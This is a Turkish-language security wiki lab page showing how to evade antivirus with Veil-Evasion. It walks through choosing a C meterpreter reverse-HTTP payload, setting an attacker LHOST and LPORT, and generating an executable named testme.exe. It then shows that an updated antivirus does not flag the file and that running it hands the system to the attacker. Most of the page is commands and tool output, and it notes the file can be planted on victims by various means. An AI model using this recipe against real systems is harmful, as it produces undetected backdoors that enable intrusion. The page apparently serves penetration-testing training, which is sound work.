Antivirüs Atlatma

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması.

Araçlar:

  • Veil-evasion master
  • Armitage

Lab Senaryosu:

Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak çalışmaktadır bundan dolayı tanımadığı bir yazılımı veya davranışını tanımlayamadığı bir yazılımı tehdit olarak algılamamaktadır.

İlk olarak encoding edilmiş zararlı yazılımı oluşturmalıyız. Bu iş için veil-frame work kullanılacaktır;

Not: Veil-framework kurulumu eğitimlerimizde anlatılmaktadır.

Veil dizinine gidilerek program çalıştırılır;

root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py

Elde edilmesi beklenen ekran;

Veil.png

List komutu ile tüm olası payload çeşitleri listelenir;

[>] Please enter a command: list

Bu aşamada birçok zaralı yöntemi seçilebilmektedir.

Burada 3. sırada bulunan, C dilinde yazılmış ve saldırganın makinesine HTTP ile bağlantı isteği gönderecek olan bir payload seçilecektir.

[>] Please enter a command: 3
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: c/meterpreter/rev_http loaded

Bu aşamadan sonra saldırganın IP adresi ve port numarası girilip zararlı yazılımın bu standartlarda üretilmesi sağlanmalıdır.

Girilmesi gereken komutlar:

set LHOST  192.168.1.41
set LPORT 4445
generate

İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları:

Required Options: 
Name                 Current Value      Description
----               -------------   	-----------
LHOST       	      	                IP of the metasploit handler
LPORT       	      	8080	         Port of the metasploit handler
compile_to_exe  	Y   	        Compile to an executable

Available commands:

       	set     	     	set a specific option value
       	info    	     	show information about the payload
       	generate		generate payload
       	back    	   	go to the main menu
       	exit    	     	exit Veil

[>] Please enter a command: set LHOST  192.168.1.41
[>] Please enter a command: set LPORT 4445
[>] Please enter a command: generate

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: testme

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

[*] Executable written to: /usr/share/veil-output/compiled/testme.exe

Language:           	c
Payload:               	c/meterpreter/rev_http
Required Options:  	LHOST=192.168.1.41  LPORT=4445  compile_to_exe=Y
Payload File:            /usr/share/veil-output/source/testme.c
Handler File:            /usr/share/veil-output/handlers/testme_handler.rc

[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe

Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir.

Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma sonucu;

Avatlatma.png


Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir.

Halbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta ve sistem saldırganın eline geçmiş olmaktadır.